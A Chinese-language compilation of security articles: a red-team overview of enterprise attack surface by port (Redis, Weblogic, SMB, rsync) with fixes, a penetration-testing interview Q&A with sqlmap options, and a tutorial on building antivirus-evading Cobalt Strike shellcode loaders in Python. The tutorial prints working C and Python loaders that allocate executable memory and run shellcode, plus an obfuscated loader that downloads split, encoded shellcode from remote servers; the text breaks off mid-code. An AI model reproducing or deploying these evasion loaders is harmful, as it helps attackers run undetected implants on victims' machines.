补丁ms17010文章列表:

• 1、红队视角下的企业安全运营
• 2、渗透测试岗位面试题多人实战大汇总
• 3、利用python免杀cs shellcode
• 4、夏拍流通硬币普制币TOP10
• 5、让黑客直呼太扎心了！糟糕的内网靶场实战

红队视角下的企业安全运营

公众号：渗透师老A
专注分享渗透经验，干货技巧....

作者：WhoamIXX

转自:https://www.freebuf.com/articles/network/286647.html

众所周知，网络安全的本质是攻与防，不论谈及网络安全的哪一方面都必会涉及到攻与防。作为每年参加红蓝对抗的老司机，目睹了很多大型企业安全运营中存在的薄弱点，下面就以红队的视角下跟大家聊聊企业安全运营，希望能抛砖引玉，为网安事业添一片瓦。

1、红队视角下的企业安全威胁

信息搜集

红队渗透的本质是信息搜集：

1、常规信息搜集

IT资产（域名、子域名、IP地址、C段、Whois信息、开放端口、运行服务、Web中间件、Web应用、操作系统、移动应用、网络架构......）、企业信息搜集、Github信息搜集、网盘信息搜集、邮箱信息搜集、网络空间引擎信息搜集(fofa、shodan....)、靶标企业的组织架构（单位的部门划分、人员信息、工作职能、下属单位等）、供应商信息(相关合同、系统、软件、硬件、代码、服务、人员......)、敏感信息泄露（代码、文档、邮箱、通讯录、历史漏洞泄露.....）

掌握了目标企业相关人员信息和组织架构，就可以快速定位关键人物实施鱼叉攻击，或确定内网横纵向渗透路径。

收集IT资产可以为漏洞发现和利用提供数据支撑。

掌握企业和供应商合作的相关信息，可有针对性开展供应链攻击提供有效支撑。

2、非常规信息搜集：社工库信息搜集、针对不通后缀的域名(.net/.dev/.io)、公众号小程序信息搜集、各种贴吧微博社交平台等。

Note：HVV分数分为路径分和靶标分。靶标隐藏在内网核心段，由防守方层层布防，重点监控，得分较难。

而路径分HVV后期计算较为宽松，视裁判而言，有的资产只要跟目标沾边也可算得分。所以刷边缘资产得路径分是HVV中必不可少的一环。

刷边缘资产，批量漏扫工具很多，而好用的漏洞EXP才是关键。在HVV期间，时间紧，目标资产多，不可面面俱到把所有漏洞都测到。而且HVV仅需要权限类漏洞，所以只需要扫描SQL注入、框架RCE、未授权之类的，具体如shiro反序列化、weblogic系列漏洞、Redis等未授权访问.....

资产收集

外网边界突破

1、弱口令：

普通用户/管理员弱口令都可得分，且OA系统、邮件系统的弱口令可泄露大量敏感数据

2、文件上传：

通过各种绕过获取服务器权限

3、数据库：

弱口令

SQL注入

内网

4、框架类漏洞

OA类：泛微、通达、致远等

邮件类：coremail,webmail

其他：phpstudy,thinkphp等

5、中间件漏洞

Apache、Weblogic、Jboss.....

6、跨站&钓鱼

跨站脚本执行一般效率低且不稳定，钓鱼需要免杀以及精准

Getshell常用方法

内网渗透

1、内网信息搜集

收集本机信息、查询当前权限、判断是否存在域、探测域内存活主机、扫描域内端口、收集域内基础信息、查找域控制器、获取域内的用户和管理员信息、定位域管理员、查找域管理进程、利用PowerShell收集域信息、分析域内网段划分情况及拓扑结构.

2、横向移动

PTH&撞库、内网web服务攻击，搭建代理

3、权限维持

添加隐藏账号、自启动、计划任务、注册服务等

以上我把红队攻击的重点流程给大家介绍了下，为的是知己知彼百战不殆，正所谓未知攻焉知防。下面我就取一瓢为大家实战演练一下。

实战演练

2375端口（docker）

存在漏洞：未授权访问

检测方式：通过docker daemon api执行docker命令

修复建议：Bind 2375 to 127.0.0.1

2181端口（zookeeper）

存在漏洞：经ZooKeeper默认开启在2181端口，在未进行任何访问控制情况下，攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境，修改或删除Node等。

检测方式：攻击者可通过执行envi命令获取大量敏感信息，包括系统名称、Java环境、删除node。

获取成功

连接成功

修复建议：修改zookeeper默认端口、添加访问控制、配置服务来源地址限制策略、增加zookeeper的认证配置。

873端口（rsync）

存在漏洞：Rsync默认端口873，可以使用Nmap扫描开放端口是否开放,若开放端口，查看时候可默认口令登陆。使用命令查看：rsync -av x.x.x.x::

既然是同步文件，自然有选择查看、上传或者下载的能力，这要视权限设定，运气好的情况下可秒杀站点。

利用方法：攻击者可执行下载/上传等操作，也可以尝试上传webshell。

列出目标服务器的同步目录

查看模块文件

修复建议：更改rysnc默认配置文件/etc/rsyncd.conf，添加或修改参数

访问控制：设置host allow，限制允许访问主机的IP

权限控制：设置read only，将模块设置成只读

访问认证：设置auth、secrets，认证成功才能调用服务

模块隐藏：设置list，将模块隐藏

445端口（SMB）

存在漏洞：信息泄露、远程代码执行

利用方法：可利用共享获取敏感信息、缓冲区溢出导致远程代码执行，Eg：ms17010

攻击成功

修复建议：临时修复：添加入站规则，关闭445端口。

打相应漏洞补丁。

443端口（SSL）

存在漏洞：OpenSSL 心脏出血。

利用方法：攻击者可以远程读取存在漏洞版本的openssl服务器内存中多达64K的数据。

检测结果

可以直接抓到正在登录Web应用的账号密码等信息

修复建议：升级 openssl 到新版本，并重新启动。

生成新密钥，将新密钥提交给你的CA，获得新的认证之后在服务器上安装新密钥。

6379 端口（Redis）

存在漏洞：未授权访问

利用方法：绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。

修改建议：修改默认端口 增加鉴权

7001 Weblogic RCE漏洞

存在漏洞：漏洞编号为CVE-2019-2725，可远程执行命令，getshell等。

远程执行反弹shell命令

执行结果

修复建议：

用户可通过在weblogic启动参数中禁用bea_wls9_async_response的方式，对此漏洞形成临时防护。

下载相应补丁安装包，打补丁。

2、 提升企业安全运营能力

如果你有在甲方工作的经验就会知道企业安全运营这个岗位是具有很大挑战的，挑战不是来源于技术挑战，而是不论是安全协调工作还是在去提升集团全体员工安全意识落地都会遇到很大阻力。网络安全意识淡薄是最大的问题，所以常态化的网络安全意识培训是首要任务，有了这个大前提才可谈网络安全运营中心的构建和落地。

安全能力中心的构建：

1>能打硬仗的攻防人才组建，常态化研究最新漏洞进展，结合集团资产进行预警和处置修复跟踪。

2>形成闭环的应急响应能力和机制，智能安全编排平台辅助。

3>漏洞生命周期管理能力。

4>高效的流程（资产管理流程、威胁情报流程、漏洞管理流程、事件处置流程）

5>常态化对企业资产进行收敛，最大程度降低风险暴露面（Eg:以上实战演练中暴露的敏感端口和服务）

6>全流量安全设备的常态化运营（将最新爆出的漏洞，利用威胁大数据、机器学习和人工持续化更新特征库和规则库以及调用威胁情报平台的接口常态化实时准确检测）

7>每年进行内部红蓝对抗演练，提升攻防能力。

渗透测试岗位面试题多人实战大汇总

面试经验总结

经过我对多个小伙伴的面试过程及结果分析，发现有很多人总喜欢说这个不怎么了解那个不怎么了解，如果你什么都不了解还来面什么试啊，所以切记，在面试过程中如果问到了你不会的技术问题，千万不要说这个不怎么了解，你可以说一些相近的东西，如果什么都想不到就说暂时想不起来了，千万不要表现出你什么都不会的样子，因为这样就算面试官不说什么你也自己先把自己给否掉了，这是很忌讳的。

作为一个技术人自信是基本素质，如果你都觉得自己不行，那你就是不行，你永远都不可能行了。只要你有自信觉得自己可以，那你就是可以，就算这个你不会那你也会逼着自己去学，而且这种学习效率是很高的，你会投入很大的热情与精力，记得也会很牢靠。

注意：如果你对自己的技术很自信可以豪横一点，就说“百度能解决的问题请不要问我，谢谢！”

常见面试题总结

1、假如给你一个网站你怎么去渗透？

信息收集首先看是什么类型的网站，针对不同类型的网站有不同的信息搜集方案，如大型企业网站可以用天眼查，启信宝等查询法人股份等信息，小型网站可以查询使用了哪类建站系统1.whois查詢,获取注册者邮箱姓名电话等。2.查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。3.查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞4.查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如 rsync,訫脏滴血，mysql,ftp,ssh弱口令等。5.扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏，比如php探针6.google hack进一步探测网站的信息，后台，敏感文件7.查看这个网站都有哪些功能，针对不同的功能可以实现不同的漏洞利用

2、whois查詢主要查的是什么?

1.域名信息2.注册商3.联系人4.联系邮箱5.网站创建时间6.网站过期时间7.DNS信息8.网站状态拓展：什么是whois？whois可以理解为域名数据库搜索引擎

3、常用哪些查询网站

1.中国互联网信息中心whois查询官网地址：http://www.cnnic.net.cn/2.站长之家whois查询官网地址：http://whois.chinaz.com/3.站长工具whois查询官网地址：http://tool.chinaz.com/ipwhois/4.全球whois查询官网地址：https://www.whois365.com/cn/5.全球whois查询官网地址：https://www.whois365.com/cn/6.百度云whois查询官网地址：https://cloud.baidu.com/product/bcd.html?track=cp:aladdin|kw:1487.新网whois查询官网地址：http://whois.xinnet.com/domain/whois_login.jsp8.时代互联网址地址：http://www.now.cn/9.alexa.cn whois查询官网地址：http://whois.alexa.cn/10.whoissoft.com官网地址：http://whoissoft.com/11.爱名网whois查询官网地址：https://whois.22.cn/12.网络工具大全官网地址：http://tools.now.cn/13.网站建设官网地址：http://www.zw.cn/14.中国万网whois官网地址：http://whois.zw.cn/

4、给你个域名怎么知道ip地址？

1.最简单的用ping2.nslookup 域名查看3.利用站长之家等在线查询网站4.云悉等指纹识别5.ToolBox等浏览器插件

5、nmap扫描端口用什么命令?

-p 加端口号或1-65535拓展：nmap端口扫描参数-sS (TCP SYN扫描)-sT (TCP connect()扫描)-sU (UDP扫描)-sV (版本探测)-O (启用操作系统检测)-f (报文分段); --mtu (使用指定的MTU)-D <decoy1 ，decoy2，...> (使用诱饵隐蔽扫描)-S <IP_Address> (源地址哄骗)

6、网站常见容器有哪些？

WebLogicWebSphereJBossTomcatIISApacheNginx

7、IIS常见漏洞

1.PUT漏洞2.短文件名猜解3.远程代码执行4.解析漏洞

8、发现IIS的网站，怎样试它的漏洞？

区分版本1.IIS6.0/7.5解析漏洞2.IIS 7.5 NET源代码泄露和身份验证漏洞3.IIS 7.5经典的ASP验证绕过4.IIS 6.0安装PHP绕过认证漏洞

9、遇到WebLogic的网站容器，你会测什么漏洞？

weblogic反序列化漏洞

10、常测什么端口

443 网页浏览端口445 共享文件夹3306 mysql数据库1443 mssql数据库20 21 ftp拓展：常见端口号端口号 端口说明 攻击技巧21/22/69 ftp/tftp：文件传输协议 爆破嗅探溢出后门22 ssh：远程连接 爆破OpenSSH；28个退格23 telnet：远程连接 爆破嗅探25 smtp：邮件服务 邮件伪造53 DNS：域名系统 DNS区域传输DNS劫持DNS缓存投毒DNS欺骗利用DNS隧道技术刺透防火墙67/68 dhcp 劫持欺骗110 pop3 爆破139 samba 爆破未授权访问远程代码执行143 imap 爆破161 snmp 爆破389 ldap 注入攻击未授权访问512/513/514 linux r 直接使用rlogin873 rsync 未授权访问1080 socket 爆破：进行内网渗透1352 lotus 爆破：弱口令信息泄漏：源代码1433 mssql 爆破：使用系统用户登录注入攻击1521 oracle 爆破：TNS注入攻击2049 nfs 配置不当2181 zookeeper 未授权访问3306 mysql 爆破拒绝服务注入3389 rdp 爆破Shift后门4848 glassfish 爆破：控制台弱口令认证绕过5000 sybase/DB2 爆破注入5432 postgresql 缓冲区溢出注入攻击爆破：弱口令5632 pcanywhere 拒绝服务代码执行5900 vnc 爆破：弱口令认证绕过6379 redis 未授权访问爆破：弱口令7001 weblogic Java反序列化控制台弱口令控制台部署webshell80/443/8080 web 常见web攻击控制台爆破对应服务器版本漏洞8069 zabbix 远程命令执行9090 websphere控制台 爆破：控制台弱口令Java反序列9200/9300 elasticsearch 远程代码执行11211 memcacache 未授权访问27017 mongodb 爆破未授权访问

11、内网扫描到445端口测什么漏洞？

永恒之蓝ms17-010

12、内网如何实现跨域？

1.jsonp跨域利用了 script 不受同源策略的限制缺点：只能 get 方式，易受到 XSS攻击2.CORS跨域当使用XMLHttpRequest发送请求时，如果浏览器发现违反了同源策略就会自动加上一个请求头 origin；后端在接受到请求后确定响应后会在后端在接受到请求后确定响应后会在 Response Headers 中加入一个属性 Access-Control-Allow-Origin；浏览器判断响应中的 Access-Control-Allow-Origin 值是否和当前的地址相同，匹配成功后才继续响应处理，否则报错缺点：忽略 cookie，浏览器版本有一定要求3.代理跨域请求前端向发送请求，经过代理，请求需要的服务器资源缺点：需要额外的代理服务器4.Html5 postMessage 方法允许来自不同源的脚本采用异步方式进行有限的通信，可以实现跨文本、多窗口、跨域消息传递缺点：浏览器版本要求，部分浏览器要配置放开跨域限制5.修改 document.domain 跨子域相同主域名下的不同子域名资源，设置 document.domain 为 相同的一级域名缺点：同一一级域名；相同协议；相同端口6.基于 Html5 websocket 协议websocket 是 Html5 一种新的协议，基于该协议可以做到浏览器与服务器全双工通信，允许跨域请求缺点：浏览器一定版本要求，服务器需要支持 websocket 协议7.document.xxx iframe通过 iframe 是浏览器非同源标签，加载内容中转，传到当前页面的属性中缺点：页面的属性值有大小限制

13、用什么方法实现反向代理？

EarthWormreGeorg-masterTunna-masterproxifier

14、外网渗透会用到哪些工具？

MetasploitSQLmapNmapBeEFSocial Engineer Toolkit(SET)Wiresharkw3afCORE ImpactOWASP ZAPCanvasAircrack-ngBurp SuiteHydraJohn the RipperAWVS御剑

15、sqlmap盲注用什么参数？

-technique拓展：sql注入工具sqlmap使用参数说明Options（选项）：--version 显示程序的版本号并退出-h, --help 显示此帮助消息并退出-v VERBOSE 详细级别：0-6（默认为1）Target（目标）：以下至少需要设置其中一个选项，设置目标URL。-d DIRECT 直接连接到数据库。-u URL, --url=URL 目标URL。-l LIST 从Burp或WebScarab代理的日志中解析目标。-r REQUESTFILE 从一个文件中载入HTTP请求。-g GOOGLEDORK 处理Google dork的结果作为目标URL。-c CONFIGFILE 从INI配置文件中加载选项。Request（请求）：:这些选项可以用来指定如何连接到目标URL。--data=DATA 通过POST发送的数据字符串--cookie=COOKIE HTTP Cookie头--cookie-urlencode URL 编码生成的cookie注入--drop-set-cookie 忽略响应的Set - Cookie头信息--user-agent=AGENT 指定 HTTP User - Agent头--random-agent 使用随机选定的HTTP User - Agent头--referer=REFERER 指定 HTTP Referer头--headers=HEADERS 换行分开，加入其他的HTTP头--auth-type=ATYPE HTTP身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)--auth-cred=ACRED HTTP身份验证凭据（用户名:密码）--auth-cert=ACERT HTTP认证证书（key_file，cert_file）--proxy=PROXY 使用HTTP代理连接到目标URL--proxy-cred=PCRED HTTP代理身份验证凭据（用户名：密码）--ignore-proxy 忽略系统默认的HTTP代理--delay=DELAY 在每个HTTP请求之间的延迟时间，单位为秒--timeout=TIMEOUT 等待连接超时的时间（默认为30秒）--retries=RETRIES 连接超时后重新连接的时间（默认3）--scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式--safe-url=SAFURL 在测试过程中经常访问的url地址--safe-freq=SAFREQ 两次访问之间测试请求，给出安全的URLOptimization（优化）：这些选项可用于优化SqlMap的性能。-o 开启所有优化开关--predict-output 预测常见的查询输出--keep-alive 使用持久的HTTP（S）连接--null-connection 从没有实际的HTTP响应体中检索页面长度--threads=THREADS 最大的HTTP（S）请求并发量（默认为1）Injection（注入）：这些选项可以用来指定测试哪些参数， 提供自定义的注入payloads和可选篡改脚本。-p TESTPARAMETER 可测试的参数（S）--dbms=DBMS 强制后端的DBMS为此值--os=OS 强制后端的DBMS操作系统为这个值--prefix=PREFIX 注入payload字符串前缀--suffix=SUFFIX 注入payload字符串后缀--tamper=TAMPER 使用给定的脚本（S）篡改注入数据Detection（检测）：这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。--level=LEVEL 执行测试的等级（1-5，默认为1）--risk=RISK 执行测试的风险（0-3，默认为1）--string=STRING 查询时有效时在页面匹配字符串--regexp=REGEXP 查询时有效时在页面匹配正则表达式--text-only 仅基于在文本内容比较网页Techniques（技巧）：这些选项可用于调整具体的SQL注入测试。--technique=TECH SQL注入技术测试（默认BEUST）--time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）--union-cols=UCOLS 定列范围用于测试UNION查询注入--union-char=UCHAR 用于暴力猜解列数的字符Fingerprint（指纹）：-f, --fingerprint 执行检查广泛的DBMS版本指纹Enumeration（枚举）：这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己的SQL语句。-b, --banner 检索数据库管理系统的标识--current-user 检索数据库管理系统当前用户--current-db 检索数据库管理系统当前数据库--is-dba 检测DBMS当前用户是否DBA--users 枚举数据库管理系统用户--passwords 枚举数据库管理系统用户密码哈希--privileges 枚举数据库管理系统用户的权限--roles 枚举数据库管理系统用户的角色--dbs 枚举数据库管理系统数据库--tables 枚举的DBMS数据库中的表--columns 枚举DBMS数据库表列--dump 转储数据库管理系统的数据库中的表项--dump-all 转储所有的DBMS数据库表中的条目--search 搜索列（S），表（S）和/或数据库名称（S）-D DB 要进行枚举的数据库名-T TBL 要进行枚举的数据库表-C COL 要进行枚举的数据库列-U USER 用来进行枚举的数据库用户--exclude-sysdbs 枚举表时排除系统数据库--start=LIMITSTART 第一个查询输出进入检索--stop=LIMITSTOP 最后查询的输出进入检索--first=FIRSTCHAR 第一个查询输出字的字符检索--last=LASTCHAR 最后查询的输出字字符检索--sql-query=QUERY 要执行的SQL语句--sql-shell 提示交互式SQL的shellBrute force（蛮力）：这些选项可以被用来运行蛮力检查。--common-tables 检查存在共同表--common-columns 检查存在共同列User-defined function injection（用户自定义函数注入）：这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径File system access（访问文件系统）：这些选项可以被用来访问后端数据库管理系统的底层文件系统。--file-read=RFILE 从后端的数据库管理系统文件系统读取文件--file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件--file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径Operating system access（操作系统访问）：这些选项可以用于访问后端数据库管理系统的底层操作系统。--os-cmd=OSCMD 执行操作系统命令--os-shell 交互式的操作系统的shell--os-pwn 获取一个OOB shell，meterpreter或VNC--os-smbrelay 一键获取一个OOB shell，meterpreter或VNC--os-bof 存储过程缓冲区溢出利用--priv-esc 数据库进程用户权限提升--msf-path=MSFPATH Metasploit Framework本地的安装路径--tmp-path=TMPPATH 远程临时文件目录的绝对路径Windows注册表访问：这些选项可以被用来访问后端数据库管理系统Windows注册表。--reg-read 读一个Windows注册表项值--reg-add 写一个Windows注册表项值数据--reg-del 删除Windows注册表键值--reg-key=REGKEY Windows注册表键--reg-value=REGVAL Windows注册表项值--reg-data=REGDATA Windows注册表键值数据--reg-type=REGTYPE Windows注册表项值类型General（一般）：这些选项可以用来设置一些一般的工作参数。-t TRAFFICFILE 记录所有HTTP流量到一个文本文件中-s SESSIONFILE 保存和恢复检索会话文件的所有数据--flush-session 刷新当前目标的会话文件--fresh-queries 忽略在会话文件中存储的查询结果--eta 显示每个输出的预计到达时间--update 更新SqlMap--save file保存选项到INI配置文件--batch 从不询问用户输入，使用所有默认配置。Miscellaneous（杂项）：--beep 发现SQL注入时提醒--check-payload IDS对注入payloads的检测测试--cleanup SqlMap具体的UDF和表清理DBMS--forms 对目标URL的解析和测试形式--gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果--page-rank Google dork结果显示网页排名（PR）--parse-errors 从响应页面解析数据库管理系统的错误消息--replicate 复制转储的数据到一个sqlite3数据库--tor 使用默认的Tor（Vidalia/ Privoxy

16、Burp Suite重放包怎么做？

发送到Repeater

17、对POST请求用户名密码爆破发送到哪里？

发送到Intruder

18、越权漏洞有了解么

水平越权:也可以把其称作访问控制攻击漏洞.Web应用程序在接收到用户的请求时，我们在增删改查某条数据时候，没有判断数据所对应的用户，或者在判断数据的用户时是通过从用户表单参数中获取userid来实现的，这里的话我们可以修改userid来实现水平越权。垂直越权：垂直越权又叫做权限提升攻击，具体原因就是web应用没有做用户权限控制，或者只是在菜单上做了权限控制，导致恶意用户只要猜测到其他管理页面的URL，就可以访问或者控制其他角色拥有的数据或者页面，达到权限提升的目的。

19、有哪些上传绕过的方式？

1.客户端js验证2.服务器端验证3. 配合文件包含漏洞4. 配合服务器解析漏洞绕过5. 配合操作系统文件命令规则6. CMS、编辑器漏洞7. 配合其他规则8. WAF绕过9. 文件后缀名绕过10. 文件内容头校验（gif89a）11. 文件头content-type字段校验（image/gif）

20、window的安全日志在哪里？

电脑桌面右键单击此电脑，选中管理，进入管理界面，点击事件查看器，接着展开windows日志选项，windows日志界面点击安全选项卡，进入安全日志列表，可以记录所有电脑安全审核动作

21、linux中怎么查看系统日志

在/var/log中

22、如何查看被入侵后敲过的命令？

History

其他一些面试问题

1 linux 添加 删除 修改 复制一个文件

2 windows linux 最高权限是什么

3 路由器和交换机有什么区别 （自我介绍说成网络工程师了。。）

4 windows 域 和 域控

5 sql注入的危害 和 如何修复

6 sql注入如何拿到shell

7 什么是xss

8 文件上传漏洞 文件上传到哪了

9 文件上传漏洞 怎么拿到shell

10 使用脏牛时 把服务器系统搞蓝屏了怎么办

11除了教学的方式 还有哪些获取知识的方式

12经过这段时间的学习 你今后对哪些方向感兴趣

13擅长的技能 未来的意向

14 csrf与xss区别

15 linux 查找文件

16 除了教学的方式 还有哪些获取知识的方式

17语言接触过哪些?

18扫过什么网站

19给你个靶机能按照文档否找出靶机漏洞

20在助学基地学习了什么？

21你有系统学习网络安全方面的知识吗？

22什么叫全双工，什么叫半双工？

23学过什么渗透工具？

24御剑的主要功能？

25 bp爆破模块？

26爆破四种模式？简述过程

27 sql注入类型？

28抓包怎么区分包头，包体，正文？

29 sqlmap -u -r 区别

30 python和php能用到什么程度

31三次握手

32自己怎么挖掘到的漏洞，具体的步骤

33 linux的日志文件在哪里

34 怎么linux查看进程

35 拿到shell以后 3389没有打开，不能直接用命令打开3389，怎么远程连接

36 给你一个网站 ，你应该做些什么

37 linux怎么查看今天创建过什么历史文件

38 流量监控 是怎么监控的

39 kali的 ms17010

40 sql注入 说一下怎么查看数据库

41 sql注入除了手动 还有什么方法查看sql注入

42 sql注入怎么绕过waf的语句

43 sql的注入经常使用什么手法

利用python免杀cs shellcode

原创AgeloVito合天智汇

0x01 前言

​ 2019年，告别了coder的世界，告别了从前的生活。我决定暂时抛开金钱至上的价值体系，以一个Fucking loser的身份去寻找人生中的三大哲学问题，我是谁，我在哪儿，我在做什么。褪去了互联网行业的尔虞我诈，轻浮缥缈。在这个铺天盖地的泛娱乐时代，我决定去看看大海，去感受下海水的味道，没错，它确实是咸的。当沙滩上的沙子铺满全身的那一刻，我，拥有了几分钟童年。在途中，偶遇了黄河，没错，它确实很黄，并且波涛汹涌。也在这途中，缘分使我进入了曾经告别的安全行业。

0x02 概述

1、什么是shellcode

​ 在维基百科中这样解释道：在黑客攻击中，shellcode是一小段代码，用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”，是因为它通常启动一个命令shell，攻击者可以从这个命令shell控制受损的计算机，但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷（payload）的功能不仅限于生成shell，所以有些人认为shellcode的名称是不够严谨的。然而，试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。

​ 翻译成人话就是：shellcode是一段机器码，用于执行某些动作。

2、什么是机器码

​ 在百度百科中这样解释道：计算机直接使用的程序语言，其语句就是机器指令码，机器指令码是用于指挥计算机应做的操作和操作数地址的一组二进制数。

​ 翻译成人话就是：直接指挥计算机的机器指令码。

​ 人们用助记符号代替机器指令码从而形成了汇编语言，后来为了使计算机用户编程序更容易，发展出了各种高级计算机语言。但是，无论是汇编语言还是其他各种面向过程异或面向对象的高级语言所写的代码最终都要被相关的翻译编译环境转换成相应的机器指令码，计算机才能运行该段代码，因为计算机只认识机器指令码。

3、什么是shellcode loader

​ 人话：shellcode loader 是用于加载和运行shellcode的代码。

C/C 加载方式

#include "pch.h"#include <windows.h>#include <stdio.h>#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")//不显示窗口unsigned char shellcode[] = "xfcxe8x89x00x00x00x60x89xe5......";void main(){ LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (Memory == NULL) { return; } memcpy(Memory, shellcode, sizeof(shellcode)); ((void(*)())Memory)();}

Python 加载方式

#!/usr/bin/pythonimport ctypesshellcode = bytearray("xfcxe8x89x00x00x00x60x89......")ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

​ 当然，shellcode loader的编写方式很多，汇编，go，csharp以及其他很多语言，这里不在一一举例，接下来我们进入利用python语言编写 shellcode loader 以达到静态动态都绕过杀软的目的。

0x03 为什么使用python

​ python语言入门门槛低，上手快，且两三年前就出现了这种免杀方式，但是很多人说网上公开的代码已经不免杀了。事实真的如此吗？你有没有静下心来code过，是否去了解过相关的原理，是否通过学习到的原理去思维发散过，是否通过code去fuzz过？如果没有，你的Cobaltstrike和Metasploit只适合躺在那儿意淫，怪我咯。废话不多说，进入正题。

0x04 环境准备

1、python-2.7.17.amd64

​ 下载地址：https://www.python.org/ftp/python/2.7.17/python-2.7.17.amd64.msi

2、pywin32-227.win-amd64-py2.7

​ 下载地址：https://github.com/mhammond/pywin32/releases

3、PyInstaller3.0

​ 下载地址：https://github.com/pyinstaller/pyinstaller/releases

4、简要说明：

​ 这一套环境搭配是我经过不断的实验和个人喜好总结出来的，安装方式不在累述，如果你连这点学习能力都没有话，你还是让Cobaltstrike和Metasploit躺在那儿意淫吧。个人建议：第一：不要使用pip方式安装PyInstaller，至于为什么，你多尝试几次就知道各种兼容环境是有多麻烦了。第二：如果你本机还安装了python3的环境，如果你怕麻烦，你可以单独在虚拟机里面安装这个环境，因为python3和python2共存，你还得倒腾一会儿，里面的坑还有 pip2 pip3得区分开等等。愿意倒腾的推荐下面几篇文章用作参考

https://blog.csdn.net/zydz/article/details/78121936

https://blog.csdn.net/C_chuxin/article/details/82962797

https://blog.csdn.net/qq_34444097/article/details/103027906

0x05 免杀原理

1、：shellcode字符串 不做硬编码（人话：shellcode字符串不写死在代码里面）

2、：shellcode字符串 多种编码方式混淆

3、：shellcode字符串 加密

4、：添加无危害的代码执行流程扰乱av分析（早些年的花指令免杀思维）

5、：CobaltStrike生成的shellcode是一段下载者，主要功能是下载becon.dll，然后加载进内存，很多功能都在bencon里面，所以说cs的shellcode其实不具备多少危险动作的，但是它为什么会被杀毒软件查杀呢，那是因为杀毒软件利用一些算法例如模糊哈希算法（Fuzzy Hashing）提取出来了特征码。

6：CobaltStrike自身是用的管道进行进程通信。

​ 目前的反病毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。

​ 根据我fuzz得出的结论：动态行为查杀真的不好过么？答案是否定的：CobaltStrike的管道通信模式加上将花指令免杀思维运用在高级语言层面上一样有效，人话就是在shellcode loader的代码层面加一些正常的代码，让exe本身拥有正常的动作，扰乱av的判断，当然这个的前提是因为我们站在了CobaltStrike的管道通信模式的优势上。静态查杀好过么？答案是：好过，shellcode不落地 CobaltStrike本身的管道通信模式 shellcode字符串各种组合的编码 加密。云查杀的特点约等于特征查杀，好过。

总结：本文所阐述的粗略且浅显的免杀方法都是站在CobaltStrike强大的肩膀上实现的。

0x06 show you the code

from ctypes import *import ctypesimport sys, os, hashlib, time, base64import random, stringimport requestsimport time# 获取随机字符串函数，减少特征def GenPassword(length): numOfNum = random.randint(1,length-1) numOfLetter = length - numOfNum slcNum = [random.choice(string.digits) for i in range(numOfNum)] slcLetter = [random.choice(string.ascii_letters) for i in range(numOfLetter)] slcChar = slcNum slcLetter random.shuffle(slcChar) getPwd = ''.join([i for i in slcChar]) return getPwd# rc4加解密函数，public_key（公钥）使用GenPassword函数，减少特征def rc4(string, op='encode', public_key=GenPassword(7), expirytime=0): ckey_lenth = 4 public_key = public_key and public_key or '' key = hashlib.md5(public_key).hexdigest() keya = hashlib.md5(key[0:16]).hexdigest() keyb = hashlib.md5(key[16:32]).hexdigest() keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or '' cryptkey = keya hashlib.md5(keya keyc).hexdigest() key_lenth = len(cryptkey) # 64 string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' hashlib.md5(string keyb).hexdigest()[0:16] string string_lenth = len(string) result = '' box = list(range(256)) randkey = [] for i in xrange(255): randkey.append(ord(cryptkey[i % key_lenth])) for i in xrange(255): j = 0 j = (j box[i] randkey[i]) % 256 tmp = box[i] box[i] = box[j] box[j] = tmp for i in xrange(string_lenth): a = j = 0 a = (a 1) % 256 j = (j box[a]) % 256 tmp = box[a] box[a] = box[j] box[j] = tmp result = chr(ord(string[i]) ^ (box[(box[a] box[j]) % 256])) if op == 'decode': if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5( result[26:] keyb).hexdigest()[0:16]: return result[26:] else: return None else: return keyc base64.b64encode(result)# 以下为shellcode loader代码# shellcode字符串经过base64编码再经过hex编码分成三块，存放在某几个服务器上# get请求方式得到经过编码的shellcode字符串res1 = requests.get("http://xxx.xxx.xxx/code/Shellcode1.TXT")res2 = requests.get("http://xxx.xxx.xxx/code/Shellcode2.TXT")res3 = requests.get("http://xxx.xxx.xxx/code/Shellcode3.TXT")VirtualAlloc = ctypes.windll.kernel32.VirtualAllocVirtualProtect = ctypes.windll.kernel32.VirtualProtectwhnd = 